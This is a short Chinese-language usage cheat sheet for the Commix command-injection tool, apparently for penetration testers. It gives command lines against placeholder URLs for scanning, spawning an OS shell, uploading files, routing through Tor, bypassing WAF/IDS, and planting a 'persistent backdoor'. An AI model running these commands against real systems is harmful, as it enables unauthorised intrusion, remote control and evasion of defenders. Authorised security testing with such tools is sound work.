Commix 基础用法和高级用法
基础用法
Commix 是一个自动化的命令行注入工具,用于检测和利用 Web 应用程序中的命令注入漏洞。以下是基本使用方法:
-
基本扫描
python commix.py -u "http://example.com/vuln.php?id=1"
-
指定注入点
python commix.py -u "http://example.com/vuln.php?id=1" --data="user=admin"
-
使用 POST 请求
python commix.py -u "http://example.com/vuln.php" --data="username=admin&password=test"
-
指定参数
python commix.py -u "http://example.com/vuln.php?id=1" -p "id"
-
使用代理
python commix.py -u "http://example.com/vuln.php?id=1" --proxy="http://127.0.0.1:8080"
-
设置用户代理
python commix.py -u "http://example.com/vuln.php?id=1" --agent="Mozilla/5.0"
高级用法
-
使用特定的操作系统 shell
python commix.py -u "http://example.com/vuln.php?id=1" --os-cmd="uname -a"
-
交互式 shell
python commix.py -u "http://example.com/vuln.php?id=1" --os-shell
-
文件上传
python commix.py -u "http://example.com/upload.php" --file-upload="/local/path/file.txt" --file-dest="/remote/path/file.txt"
-
暴力破解参数
python commix.py -u "http://example.com/vuln.php" --batch --all
-
使用 Tor 网络
python commix.py -u "http://example.com/vuln.php?id=1" --tor --tor-port=9050
-
绕过 WAF/IDS
python commix.py -u "http://example.com/vuln.php?id=1" --tamper="space2comment"
-
多线程扫描
python commix.py -u "http://example.com/vuln.php?id=1" --threads=5
-
自定义注入标记
python commix.py -u "http://example.com/vuln.php?id=1*" --prefix="'" --suffix="'"
-
持久化后门
python commix.py -u "http://example.com/vuln.php?id=1" --backdoor
-
从文件读取目标
python commix.py -l targets.txt
-
使用特定的编码技术
python commix.py -u "http://example.com/vuln.php?id=1" --encode="base64"
-
时间延迟检测
python commix.py -u "http://example.com/vuln.php?id=1" --time-sec=5